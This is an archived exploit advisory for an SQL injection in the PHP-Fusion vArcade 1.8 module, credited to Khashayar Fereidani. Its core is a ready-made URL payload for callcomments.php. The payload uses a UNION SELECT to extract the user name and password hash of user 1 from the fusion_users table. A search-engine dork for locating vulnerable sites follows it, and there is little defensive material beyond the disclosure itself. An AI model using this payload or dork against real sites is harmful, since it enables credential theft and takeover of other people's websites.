AOH :: HP Unsorted P :: VA2237.HTM

PHP-Fusion Mod vArcade 1.8 Sql Injection Vulnerability



PHP-Fusion Mod vArcade 1.8 Sql Injection Vulnerability
PHP-Fusion Mod vArcade 1.8 Sql Injection Vulnerability



----------------------------------------------------------------

Script : PHP-Fusion Mod vArcade 1.8

Type : Sql Injection Vulnerability

Risk : High

----------------------------------------------------------------

Download From : http://venue.nu/ 

----------------------------------------------------------------

Discovered by : Khashayar Fereidani

My Official Website : HTTP://FEREIDANI.IR 

Our Team Website : Http://IRCRASH.COM 

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com

----------------------------------------------------------------

Sql Injection Vulnerability :

Vulnerable address : http://[host]/[path]/infusions/varcade/callcomments.php?comment_id=9999%27+union+select+0,user_name,2,3,4,5,6,user_password+from+fusion_users+where+user_id=1/* 

Google Dark : inurl:/infusions/varcade/

----------------------------------------------------------------

                        Tnx : God

HTTP://IRCRASH.COM HTTP://FEREIDANI.IR 

----------------------------------------------------------------

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.